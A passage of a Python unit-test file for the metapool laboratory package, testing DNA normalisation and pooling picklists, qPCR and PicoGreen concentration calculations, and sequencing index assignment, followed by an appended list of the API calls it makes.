'sam1\tWater\t384PP_AQ_BP2_HT\tA1\t2.0\t1000.0\tNormalizedDNA\t'
'A1\n'
'sam2\tWater\t384PP_AQ_BP2_HT\tA2\t7.89\t2867.5\tNormalizedDNA\t'
'A2\n'
'blank1\tWater\t384PP_AQ_BP2_HT\tB1\tnan\t0.0\tNormalizedDNA\t'
'B1\n'
'sam3\tWater\t384PP_AQ_BP2_HT\tB2\t0.0\t0.0\tNormalizedDNA\t'
'B2\n'
'sam1\tSample_Plate1\t384PP_AQ_BP2_HT\tA1\t2.0\t2500.0\t'
'NormalizedDNA\tA1\n'
'sam2\tSample_Plate1\t384PP_AQ_BP2_HT\tA2\t7.89\t632.5\t'
'NormalizedDNA\tA2\n'
'blank1\tSample_Plate2\t384PP_AQ_BP2_HT\tB1\tnan\t3500.0\t'
'NormalizedDNA\tB1\n'
'sam3\tSample_Plate2\t384PP_AQ_BP2_HT\tB2\t0.0\t3500.0\t'
'NormalizedDNA\tB2')
dna_vols = np.array([[2500., 632.5],
[3500., 3500.]])
water_vols = 3500 - dna_vols
wells = np.array([['A1', 'A2'],
['B1', 'B2']])
sample_names = np.array([['sam1', 'sam2'],
['blank1', 'sam3']])
sample_plates = np.array([['Sample_Plate1', 'Sample_Plate1'],
['Sample_Plate2', 'Sample_Plate2']])
dna_concs = np.array([[2, 7.89],
[np.nan, .0]])
obs_picklist = format_dna_norm_picklist(dna_vols, water_vols, wells,
sample_names=sample_names,
sample_plates=sample_plates,
dna_concs=dna_concs)
self.assertEqual(exp_picklist, obs_picklist)
def test_format_index_picklist(self):
exp_picklist = (
'Sample\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Transfer Volume\tIndex Name\t'
'Index Sequence\tIndex Combo\tDestination Plate Name\t'
'Destination Well\n'
'sam1\tiTru5_plate\t384LDV_AQ_B2_HT\tA1\t250\tiTru5_01_A\t'
'ACCGACAA\t0\tIndexPCRPlate\tA1\n'
'sam2\tiTru5_plate\t384LDV_AQ_B2_HT\tB1\t250\tiTru5_01_B\t'
'AGTGGCAA\t1\tIndexPCRPlate\tA2\n'
'blank1\tiTru5_plate\t384LDV_AQ_B2_HT\tC1\t250\tiTru5_01_C\t'
'CACAGACT\t2\tIndexPCRPlate\tB1\n'
'sam3\tiTru5_plate\t384LDV_AQ_B2_HT\tD1\t250\tiTru5_01_D\t'
'CGACACTT\t3\tIndexPCRPlate\tB2\n'
'sam1\tiTru7_plate\t384LDV_AQ_B2_HT\tA1\t250\tiTru7_101_01\t'
'ACGTTACC\t0\tIndexPCRPlate\tA1\n'
'sam2\tiTru7_plate\t384LDV_AQ_B2_HT\tA2\t250\tiTru7_101_02\t'
'CTGTGTTG\t1\tIndexPCRPlate\tA2\n'
'blank1\tiTru7_plate\t384LDV_AQ_B2_HT\tA3\t250\tiTru7_101_03\t'
'TGAGGTGT\t2\tIndexPCRPlate\tB1\n'
'sam3\tiTru7_plate\t384LDV_AQ_B2_HT\tA4\t250\tiTru7_101_04\t'
'GATCCATG\t3\tIndexPCRPlate\tB2')
sample_wells = np.array(['A1', 'A2', 'B1', 'B2'])
sample_names = np.array(['sam1', 'sam2', 'blank1', 'sam3'])
indices = pd.DataFrame({'i5 name': {0: 'iTru5_01_A',
1: 'iTru5_01_B',
2: 'iTru5_01_C',
3: 'iTru5_01_D'},
'i5 plate': {0: 'iTru5_plate',
1: 'iTru5_plate',
2: 'iTru5_plate',
3: 'iTru5_plate'},
'i5 sequence': {0: 'ACCGACAA', 1: 'AGTGGCAA',
2: 'CACAGACT', 3: 'CGACACTT'},
'i5 well': {0: 'A1', 1: 'B1', 2: 'C1',
3: 'D1'},
'i7 name': {0: 'iTru7_101_01',
1: 'iTru7_101_02',
2: 'iTru7_101_03',
3: 'iTru7_101_04'},
'i7 plate': {0: 'iTru7_plate',
1: 'iTru7_plate',
2: 'iTru7_plate',
3: 'iTru7_plate'},
'i7 sequence': {0: 'ACGTTACC', 1: 'CTGTGTTG',
2: 'TGAGGTGT', 3: 'GATCCATG'},
'i7 well': {0: 'A1', 1: 'A2', 2: 'A3',
3: 'A4'},
'index combo': {0: 0, 1: 1, 2: 2, 3: 3},
'index combo seq': {0: 'ACCGACAAACGTTACC',
1: 'AGTGGCAACTGTGTTG',
2: 'CACAGACTTGAGGTGT',
3: 'CGACACTTGATCCATG'}})
obs_picklist = format_index_picklist(
sample_names, sample_wells, indices)
self.assertEqual(exp_picklist, obs_picklist)
def test_compute_qpcr_concentration(self):
obs = compute_qpcr_concentration(self.cp_vals)
exp = self.qpcr_conc
npt.assert_allclose(obs, exp)
def test_compute_shotgun_pooling_values_eqvol(self):
obs_sample_vols = \
compute_shotgun_pooling_values_eqvol(self.qpcr_conc,
total_vol=60.0)
exp_sample_vols = np.zeros([3, 4]) + 60.0/12*1000
npt.assert_allclose(obs_sample_vols, exp_sample_vols)
def test_compute_shotgun_pooling_values_eqvol_intvol(self):
obs_sample_vols = \
compute_shotgun_pooling_values_eqvol(self.qpcr_conc,
total_vol=60)
exp_sample_vols = np.zeros([3, 4]) + 60.0/12*1000
npt.assert_allclose(obs_sample_vols, exp_sample_vols)
def test_compute_shotgun_pooling_values_qpcr(self):
sample_concs = np.array([[1, 12, 400],
[200, 40, 1]])
exp_vols = np.array([[0, 50000, 6250],
[12500, 50000, 0]])
obs_vols = compute_shotgun_pooling_values_qpcr(sample_concs)
npt.assert_allclose(exp_vols, obs_vols)
def test_compute_shotgun_pooling_values_qpcr_minvol(self):
sample_concs = np.array([[1, 12, 400],
[200, 40, 1]])
exp_vols = np.array([[100, 100, 4166.6666666666],
[8333.33333333333, 41666.666666666, 100]])
obs_vols = compute_shotgun_pooling_values_qpcr_minvol(sample_concs)
npt.assert_allclose(exp_vols, obs_vols)
def test_estimate_pool_conc_vol(self):
obs_sample_vols = compute_shotgun_pooling_values_eqvol(
self.qpcr_conc, total_vol=60.0)
obs_pool_conc, obs_pool_vol = estimate_pool_conc_vol(
obs_sample_vols, self.qpcr_conc)
exp_pool_conc = 323.873027979
exp_pool_vol = 60000.0
npt.assert_almost_equal(obs_pool_conc, exp_pool_conc)
npt.assert_almost_equal(obs_pool_vol, exp_pool_vol)
def test_format_pooling_echo_pick_list(self):
vol_sample = np.array([[10.00, 10.00, 5.00, 5.00, 10.00, 10.00]])
header = ['Source Plate Name,Source Plate Type,Source Well,'
'Concentration,Transfer Volume,Destination Plate Name,'
'Destination Well']
exp_values = ['1,384LDV_AQ_B2_HT,A1,,10.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A2,,10.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A3,,5.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A4,,5.00,NormalizedDNA,A2',
'1,384LDV_AQ_B2_HT,A5,,10.00,NormalizedDNA,A2',
'1,384LDV_AQ_B2_HT,A6,,10.00,NormalizedDNA,A2']
exp_str = '\n'.join(header + exp_values)
obs_str = format_pooling_echo_pick_list(vol_sample,
max_vol_per_well=26,
dest_plate_shape=[16, 24])
self.maxDiff = None
self.assertEqual(exp_str, obs_str)
def test_format_pooling_echo_pick_list_nan(self):
vol_sample = np.array([[10.00, 10.00, np.nan, 5.00, 10.00, 10.00]])
header = ['Source Plate Name,Source Plate Type,Source Well,'
'Concentration,Transfer Volume,Destination Plate Name,'
'Destination Well']
exp_values = ['1,384LDV_AQ_B2_HT,A1,,10.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A2,,10.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A3,,0.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A4,,5.00,NormalizedDNA,A1',
'1,384LDV_AQ_B2_HT,A5,,10.00,NormalizedDNA,A2',
'1,384LDV_AQ_B2_HT,A6,,10.00,NormalizedDNA,A2']
exp_str = '\n'.join(header + exp_values)
obs_str = format_pooling_echo_pick_list(vol_sample,
max_vol_per_well=26,
dest_plate_shape=[16, 24])
self.maxDiff = None
self.assertEqual(exp_str, obs_str)
def test_make_2D_array(self):
example_qpcr_df = pd.DataFrame({'Cp': [12, 0, 5, np.nan],
'Pos': ['A1', 'A2', 'A3', 'A4']})
exp_cp_array = np.array([[12.0, 0.0, 5.0, np.nan]])
np.testing.assert_allclose(make_2D_array(
example_qpcr_df, rows=1, cols=4).astype(float), exp_cp_array)
example2_qpcr_df = pd.DataFrame({'Cp': [12, 0, 1, np.nan,
12, 0, 5, np.nan],
'Pos': ['A1', 'A2', 'A3', 'A4',
'B1', 'B2', 'B3', 'B4']})
exp2_cp_array = np.array([[12.0, 0.0, 1.0, np.nan],
[12.0, 0.0, 5.0, np.nan]])
np.testing.assert_allclose(make_2D_array(
example2_qpcr_df, rows=2, cols=4).astype(float), exp2_cp_array)
def combine_dfs(self):
test_index_picklist_f = (
'\tWell Number\tPlate\tSample Name\tSource Plate Name\t'
'Source Plate Type\tCounter\tPrimer\tSource Well\tIndex\t'
'Unnamed: 9\tUnnamed: 10\tUnnamed: 11\tTransfer volume\t'
'Destination Well\tUnnamed: 14\n'
'0\t1\tABTX_35\t8_29_13_rk_rh\ti5 Source Plate\t384LDV_AQ_B2_HT\t'
'1841.0\tiTru5_01_G\tG1\tGTTCCATG\tiTru7_110_05\tA23\tCGCTTAAC\t'
'250\tA1\tNaN\n'
'1\t2\tABTX_35\t8_29_13_rk_lh\ti5 Source Plate\t384LDV_AQ_B2_HT\t'
'1842.0\tiTru5_01_H\tH1\tTAGCTGAG\tiTru7_110_06\tB23\tCACCACTA\t'
'250\tC1\tNaN\n'
'2\t1\tABTX_35\t8_29_13_rk_rh\ti7 Source Plate\t384LDV_AQ_B2_HT\t'
'1841.0\tiTru7_110_05\tA23\tCGCTTAAC\t\t\t\t250\tA1\tNaN\n'
'3\t2\tABTX_35\t8_29_13_rk_lh\ti7 Source Plate\t384LDV_AQ_B2_HT\t'
'1842.0\tiTru7_110_06\tB23\tCACCACTA\t\t\t\t250\tC1\tNaN')
test_dna_picklist_f = (
'\tSource Plate Name\tSource Plate Type\tSource Well\t'
'Concentration\tTransfer Volume\tDestination Plate Name\t'
'Destination Well\n'
'0\twater\t384LDV_AQ_B2_HT\tA1\tNaN\t3420.0\tNormalizedDNA\tA1\n'
'1\twater\t384LDV_AQ_B2_HT\tC1\tNaN\t3442.5\tNormalizedDNA\tC1\n'
'5\t1\t384LDV_AQ_B2_HT\tA1\t12.751753\t80.0\tNormalizedDNA\tA1\n'
'6\t1\t384LDV_AQ_B2_HT\tC1\t17.582063\t57.5\tNormalizedDNA\tC1')
test_qpcr_f = (
'\tInclude\tColor\tPos\tName\tCp\tConcentration\tStandard\tStatus'
'0\tTRUE\t255\tA1\tSample 1\t20.55\tNaN\t0\tNaN'
'1\tTRUE\t255\tC1\tSample 2\t9.15\tNaN\t0\tNaN')
exp_out_f = (
'Well\tCp\tDNA Concentration\tDNA Transfer Volume\tSample Name\t'
'Plate\tCounter\tPrimer i7\tSource Well i7\tIndex i7\tPrimer i5\t'
'Source Well i5\tIndex i5'
'A1\t20.55\t12.751753\t80.0\t8_29_13_rk_rh\tABTX_35\t1841.0\t'
'iTru7_110_05\tA23\tCGCTTAAC\tiTru5_01_G\tG1\tGTTCCATG'
'C1\t9.15\t17.582063\t57.5\t8_29_13_rk_lh\tABTX_35\t1842.0\t'
'iTru7_110_06\tB23\tCACCACTA\tiTru5_01_H\tH1\tTAGCTGAG')
test_index_picklist_df = pd.read_csv(
StringIO(test_index_picklist_f), header=0, sep='\t')
test_dna_picklist_df = pd.read_csv(
StringIO(test_dna_picklist_f), header=0, sep='\t')
test_qpcr_df = pd.read_csv(StringIO(test_qpcr_f), header=0, sep='\t')
exp_df = pd.read_csv(StringIO(exp_out_f), header=0, sep='\t')
combined_df = combine_dfs(
test_qpcr_df, test_dna_picklist_df, test_index_picklist_df)
pd.testing.assert_frame_equal(combined_df, exp_df, check_like=True)
def test_add_dna_conc(self):
test_dna = 'Well\tpico_conc\nA1\t2.5\nC1\t20'
test_combined = (
'Well\tCp\tDNA Concentration\tDNA Transfer Volume\tSample Name'
'\tPlate\tCounter\tPrimer i7\tSource Well i7\tIndex i7\tPrimer i5'
'\tSource Well i5\tIndex i5\n'
'A1\t20.55\t12.751753\t80.0\t8_29_13_rk_rh\tABTX_35\t1841.0\t'
'iTru7_110_05\tA23\tCGCTTAAC\tiTru5_01_G\tG1\tGTTCCATG\n'
'C1\t9.15\t17.582063\t57.5\t8_29_13_rk_lh\tABTX_35\t1842.0\t'
'iTru7_110_06\tB23\tCACCACTA\tiTru5_01_H\tH1\tTAGCTGAG')
test_exp_out = (
'Well\tCp\tDNA Concentration\tDNA Transfer Volume\t'
'Sample Name\tPlate\tCounter\tPrimer i7\tSource Well i7\tIndex i7'
'\tPrimer i5\tSource Well i5\tIndex i5\tpico_conc\n'
'A1\t20.55\t12.751753\t80.0\t8_29_13_rk_rh\tABTX_35\t1841.0\t'
'iTru7_110_05\tA23\tCGCTTAAC\tiTru5_01_G\tG1\tGTTCCATG\t2.5\n'
'C1\t9.15\t17.582063\t57.5\t8_29_13_rk_lh\tABTX_35\t1842.0\t'
'iTru7_110_06\tB23\tCACCACTA\tiTru5_01_H\tH1\tTAGCTGAG\t20')
exp_df = pd.read_csv(StringIO(test_exp_out), header=0, sep='\t')
test_in_df = pd.read_csv(StringIO(test_combined), header=0, sep='\t')
test_dna_df = pd.read_csv(StringIO(test_dna), header=0, sep='\t')
obs_df = add_dna_conc(test_in_df, test_dna_df)
pd.testing.assert_frame_equal(obs_df, exp_df, check_like=True)
def test_compute_pico_concentration(self):
obs = compute_pico_concentration(self.dna_vals)
exp = self.pico_conc
npt.assert_allclose(obs, exp)
def test_bcl_scrub_name(self):
self.assertEqual('test_1', bcl_scrub_name('test.1'))
self.assertEqual('test-1', bcl_scrub_name('test-1'))
self.assertEqual('test_1', bcl_scrub_name('test_1'))
def test_rc(self):
self.assertEqual(rc('AGCCT'), 'AGGCT')
def test_sequencer_i5_index(self):
indices = ['AGCT', 'CGGA', 'TGCC']
exp_rc = ['AGCT', 'TCCG', 'GGCA']
obs_hiseq4k = sequencer_i5_index('HiSeq4000', indices)
obs_hiseq25k = sequencer_i5_index('HiSeq2500', indices)
obs_nextseq = sequencer_i5_index('NextSeq', indices)
self.assertListEqual(obs_hiseq4k, exp_rc)
self.assertListEqual(obs_hiseq25k, indices)
self.assertListEqual(obs_nextseq, exp_rc)
with self.assertRaises(ValueError):
sequencer_i5_index('foo', indices)
def test_reformat_interleaved_to_columns(self):
wells = ['A1', 'A23', 'C1', 'C23',
'A2', 'A24', 'C2', 'C24',
'B1', 'B23', 'D1', 'D23',
'B2', 'B24', 'D2', 'D24']
exp = ['A1', 'B6', 'C1', 'D6',
'A7', 'B12', 'C7', 'D12',
'A13', 'B18', 'C13', 'D18',
'A19', 'B24', 'C19', 'D24']
obs = reformat_interleaved_to_columns(wells)
np.testing.assert_array_equal(exp, obs)
# Allow running this test module directly (e.g. `python <this file>`)
if __name__ == "__main__":
    main()
| [
"metapool.metapool.compute_shotgun_pooling_values_eqvol",
"metapool.metapool.format_index_picklist",
"metapool.metapool.calculate_norm_vol",
"metapool.metapool.add_dna_conc",
"metapool.metapool.compute_shotgun_pooling_values_qpcr",
"metapool.metapool.format_dna_norm_picklist",
"metapool.metapool.make_2D... | [((28033, 28039), 'unittest.main', 'main', ([], {}), '()\n', (28037, 28039), False, 'from unittest import TestCase, main\n'), ((1089, 1184), 'numpy.array', 'np.array', (['[[10.14, 7.89, 7.9, 15.48], [7.86, 8.07, 8.16, 9.64], [12.29, 7.64, 7.32, \n 13.74]]'], {}), '([[10.14, 7.89, 7.9, 15.48], [7.86, 8.07, 8.16, 9.64], [12.29, 7.64,\n 7.32, 13.74]])\n', (1097, 1184), True, 'import numpy as np\n'), ((1272, 1367), 'numpy.array', 'np.array', (['[[10.14, 7.89, 7.9, 15.48], [7.86, 8.07, 8.16, 9.64], [12.29, 7.64, 7.32, \n 13.74]]'], {}), '([[10.14, 7.89, 7.9, 15.48], [7.86, 8.07, 8.16, 9.64], [12.29, 7.64,\n 7.32, 13.74]])\n', (1280, 1367), True, 'import numpy as np\n'), ((1472, 1654), 'numpy.array', 'np.array', (['[[98.14626462, 487.8121413, 484.3480866, 2.183406934], [498.3536649, \n 429.0839787, 402.4270321, 140.1601735], [21.20533391, 582.9456031, \n 732.2655041, 7.545145988]]'], {}), '([[98.14626462, 487.8121413, 484.3480866, 2.183406934], [\n 498.3536649, 429.0839787, 402.4270321, 140.1601735], [21.20533391, \n 582.9456031, 732.2655041, 7.545145988]])\n', (1480, 1654), True, 'import numpy as np\n'), ((1729, 1899), 'numpy.array', 'np.array', (['[[38.4090909, 29.8863636, 29.9242424, 58.6363636], [29.7727273, 30.5681818,\n 30.9090909, 36.5151515], [46.5530303, 28.9393939, 27.7272727, 52.0454545]]'], {}), '([[38.4090909, 29.8863636, 29.9242424, 58.6363636], [29.7727273, \n 30.5681818, 30.9090909, 36.5151515], [46.5530303, 28.9393939, \n 27.7272727, 52.0454545]])\n', (1737, 1899), True, 'import numpy as np\n'), ((3424, 3447), 'io.StringIO', 'StringIO', (['plate_map_csv'], {}), '(plate_map_csv)\n', (3432, 3447), False, 'from io import StringIO\n'), ((3472, 3662), 'pandas.DataFrame', 'pd.DataFrame', (["{'Sample': ['sam1', 'sam2', 'blank1', 'sam3'], 'Row': ['A', 'A', 'B', 'B'],\n 'Col': [1, 2, 1, 2], 'Well': ['A1', 'A2', 'B1', 'B2'], 'Blank': [False,\n False, True, False]}"], {}), "({'Sample': ['sam1', 'sam2', 'blank1', 'sam3'], 'Row': 
['A',\n 'A', 'B', 'B'], 'Col': [1, 2, 1, 2], 'Well': ['A1', 'A2', 'B1', 'B2'],\n 'Blank': [False, False, True, False]})\n", (3484, 3662), True, 'import pandas as pd\n'), ((3875, 3906), 'metapool.metapool.read_plate_map_csv', 'read_plate_map_csv', (['plate_map_f'], {}), '(plate_map_f)\n', (3893, 3906), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((3916, 3990), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_plate_df', 'exp_plate_df'], {'check_like': '(True)'}), '(obs_plate_df, exp_plate_df, check_like=True)\n', (3945, 3990), True, 'import pandas as pd\n'), ((4410, 4433), 'io.StringIO', 'StringIO', (['plate_map_csv'], {}), '(plate_map_csv)\n', (4418, 4433), False, 'from io import StringIO\n'), ((4448, 4638), 'pandas.DataFrame', 'pd.DataFrame', (["{'Sample': ['sam1', 'sam2', 'blank1', 'sam3'], 'Row': ['A', 'A', 'B', 'B'],\n 'Col': [1, 2, 1, 2], 'Well': ['A1', 'A2', 'B1', 'B2'], 'Blank': [False,\n False, True, False]}"], {}), "({'Sample': ['sam1', 'sam2', 'blank1', 'sam3'], 'Row': ['A',\n 'A', 'B', 'B'], 'Col': [1, 2, 1, 2], 'Well': ['A1', 'A2', 'B1', 'B2'],\n 'Blank': [False, False, True, False]})\n", (4460, 4638), True, 'import pandas as pd\n'), ((5037, 5102), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_plate_df', 'exp'], {'check_like': '(True)'}), '(obs_plate_df, exp, check_like=True)\n', (5066, 5102), True, 'import pandas as pd\n'), ((5427, 5450), 'io.StringIO', 'StringIO', (['plate_map_csv'], {}), '(plate_map_csv)\n', (5435, 5450), False, 'from io import 
StringIO\n'), ((6002, 6113), 'pandas.DataFrame', 'pd.DataFrame', (["{'Well': ['A1', 'A2', 'B1', 'B2'], 'Sample DNA Concentration': [3.432, \n 3.239, 10.016, 2.644]}"], {}), "({'Well': ['A1', 'A2', 'B1', 'B2'], 'Sample DNA Concentration':\n [3.432, 3.239, 10.016, 2.644]})\n", (6014, 6113), True, 'import pandas as pd\n'), ((6204, 6222), 'io.StringIO', 'StringIO', (['pico_csv'], {}), '(pico_csv)\n', (6212, 6222), False, 'from io import StringIO\n'), ((6246, 6271), 'metapool.metapool.read_pico_csv', 'read_pico_csv', (['pico_csv_f'], {}), '(pico_csv_f)\n', (6259, 6271), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((6281, 6353), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_pico_df', 'exp_pico_df'], {'check_like': '(True)'}), '(obs_pico_df, exp_pico_df, check_like=True)\n', (6310, 6353), True, 'import pandas as pd\n'), ((6812, 6924), 'pandas.DataFrame', 'pd.DataFrame', (["{'Well': ['A1', 'A2', 'B1', 'B2'], 'Sample DNA Concentration': [3.432, \n 3.239, 10.016, np.nan]}"], {}), "({'Well': ['A1', 'A2', 'B1', 'B2'], 'Sample DNA Concentration':\n [3.432, 3.239, 10.016, np.nan]})\n", (6824, 6924), True, 'import pandas as pd\n'), ((7015, 7033), 'io.StringIO', 'StringIO', (['pico_csv'], {}), '(pico_csv)\n', (7023, 7033), False, 'from io import StringIO\n'), ((7057, 7082), 'metapool.metapool.read_pico_csv', 'read_pico_csv', (['pico_csv_f'], {}), '(pico_csv_f)\n', (7070, 7082), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, 
format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((7092, 7164), 'pandas.testing.assert_frame_equal', 'pd.testing.assert_frame_equal', (['obs_pico_df', 'exp_pico_df'], {'check_like': '(True)'}), '(obs_pico_df, exp_pico_df, check_like=True)\n', (7121, 7164), True, 'import pandas as pd\n'), ((7409, 7468), 'metapool.metapool.read_pico_csv', 'read_pico_csv', (['fp_spectramax'], {'plate_reader': '"""SpectraMax_i3x"""'}), "(fp_spectramax, plate_reader='SpectraMax_i3x')\n", (7422, 7468), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((7879, 7915), 'numpy.array', 'np.array', (['[[2, 7.89], [np.nan, 0.0]]'], {}), '([[2, 7.89], [np.nan, 0.0]])\n', (7887, 7915), True, 'import numpy as np\n'), ((7965, 8010), 'numpy.array', 'np.array', (['[[2500.0, 632.5], [3500.0, 3500.0]]'], {}), '([[2500.0, 632.5], [3500.0, 3500.0]])\n', (7973, 8010), True, 'import numpy as np\n'), ((8057, 8086), 'metapool.metapool.calculate_norm_vol', 'calculate_norm_vol', (['dna_concs'], {}), '(dna_concs)\n', (8075, 8086), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, 
compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((8096, 8142), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['exp_vols', 'obs_vols'], {}), '(exp_vols, obs_vols)\n', (8122, 8142), True, 'import numpy as np\n'), ((9183, 9228), 'numpy.array', 'np.array', (['[[2500.0, 632.5], [3500.0, 3500.0]]'], {}), '([[2500.0, 632.5], [3500.0, 3500.0]])\n', (9191, 9228), True, 'import numpy as np\n'), ((9310, 9348), 'numpy.array', 'np.array', (["[['A1', 'A2'], ['B1', 'B2']]"], {}), "([['A1', 'A2'], ['B1', 'B2']])\n", (9318, 9348), True, 'import numpy as np\n'), ((9399, 9447), 'numpy.array', 'np.array', (["[['sam1', 'sam2'], ['blank1', 'sam3']]"], {}), "([['sam1', 'sam2'], ['blank1', 'sam3']])\n", (9407, 9447), True, 'import numpy as np\n'), ((9502, 9538), 'numpy.array', 'np.array', (['[[2, 7.89], [np.nan, 0.0]]'], {}), '([[2, 7.89], [np.nan, 0.0]])\n', (9510, 9538), True, 'import numpy as np\n'), ((9592, 9698), 'metapool.metapool.format_dna_norm_picklist', 'format_dna_norm_picklist', (['dna_vols', 'water_vols', 'wells'], {'sample_names': 'sample_names', 'dna_concs': 'dna_concs'}), '(dna_vols, water_vols, wells, sample_names=\n sample_names, dna_concs=dna_concs)\n', (9616, 9698), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((10877, 10922), 'numpy.array', 'np.array', (['[[2500.0, 632.5], [3500.0, 
3500.0]]'], {}), '([[2500.0, 632.5], [3500.0, 3500.0]])\n', (10885, 10922), True, 'import numpy as np\n'), ((11004, 11042), 'numpy.array', 'np.array', (["[['A1', 'A2'], ['B1', 'B2']]"], {}), "([['A1', 'A2'], ['B1', 'B2']])\n", (11012, 11042), True, 'import numpy as np\n'), ((11090, 11128), 'numpy.array', 'np.array', (["[['D1', 'D2'], ['E1', 'E2']]"], {}), "([['D1', 'D2'], ['E1', 'E2']])\n", (11098, 11128), True, 'import numpy as np\n'), ((11183, 11231), 'numpy.array', 'np.array', (["[['sam1', 'sam2'], ['blank1', 'sam3']]"], {}), "([['sam1', 'sam2'], ['blank1', 'sam3']])\n", (11191, 11231), True, 'import numpy as np\n'), ((11286, 11322), 'numpy.array', 'np.array', (['[[2, 7.89], [np.nan, 0.0]]'], {}), '([[2, 7.89], [np.nan, 0.0]])\n', (11294, 11322), True, 'import numpy as np\n'), ((11376, 11504), 'metapool.metapool.format_dna_norm_picklist', 'format_dna_norm_picklist', (['dna_vols', 'water_vols', 'wells'], {'dest_wells': 'dest_wells', 'sample_names': 'sample_names', 'dna_concs': 'dna_concs'}), '(dna_vols, water_vols, wells, dest_wells=dest_wells,\n sample_names=sample_names, dna_concs=dna_concs)\n', (11400, 11504), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, bcl_scrub_name, rc, sequencer_i5_index, reformat_interleaved_to_columns\n'), ((12763, 12808), 'numpy.array', 'np.array', (['[[2500.0, 632.5], [3500.0, 3500.0]]'], {}), '([[2500.0, 632.5], [3500.0, 3500.0]])\n', (12771, 12808), True, 'import numpy as np\n'), ((12890, 12928), 'numpy.array', 'np.array', (["[['A1', 'A2'], ['B1', 'B2']]"], {}), "([['A1', 'A2'], ['B1', 'B2']])\n", (12898, 12928), True, 'import numpy as np\n'), ((12979, 13027), 
'numpy.array', 'np.array', (["[['sam1', 'sam2'], ['blank1', 'sam3']]"], {}), "([['sam1', 'sam2'], ['blank1', 'sam3']])\n", (12987, 13027), True, 'import numpy as np\n'), ((13086, 13172), 'numpy.array', 'np.array', (["[['Sample_Plate1', 'Sample_Plate1'], ['Sample_Plate2', 'Sample_Plate2']]"], {}), "([['Sample_Plate1', 'Sample_Plate1'], ['Sample_Plate2',\n 'Sample_Plate2']])\n", (13094, 13172), True, 'import numpy as np\n'), ((13224, 13260), 'numpy.array', 'np.array', (['[[2, 7.89], [np.nan, 0.0]]'], {}), '([[2, 7.89], [np.nan, 0.0]])\n', (13232, 13260), True, 'import numpy as np\n'), ((13314, 13449), 'metapool.metapool.format_dna_norm_picklist', 'format_dna_norm_picklist', (['dna_vols', 'water_vols', 'wells'], {'sample_names': 'sample_names', 'sample_plates': 'sample_plates', 'dna_concs': 'dna_concs'}), '(dna_vols, water_vols, wells, sample_names=\n sample_names, sample_plates=sample_plates, dna_concs=dna_concs)\n', (13338, 13449), False, 'from metapool.metapool import read_plate_map_csv, read_pico_csv, calculate_norm_vol, format_dna_norm_picklist, format_index_picklist, compute_qpcr_concentration, compute_shotgun_pooling_values_eqvol, compute_shotgun_pooling_values_qpcr, compute_shotgun_pooling_values_qpcr_minvol, estimate_pool_conc_vol, format_pooling_echo_pick_list, make_2D_array, combine_dfs, add_dna_conc, compute_pico_concentration, 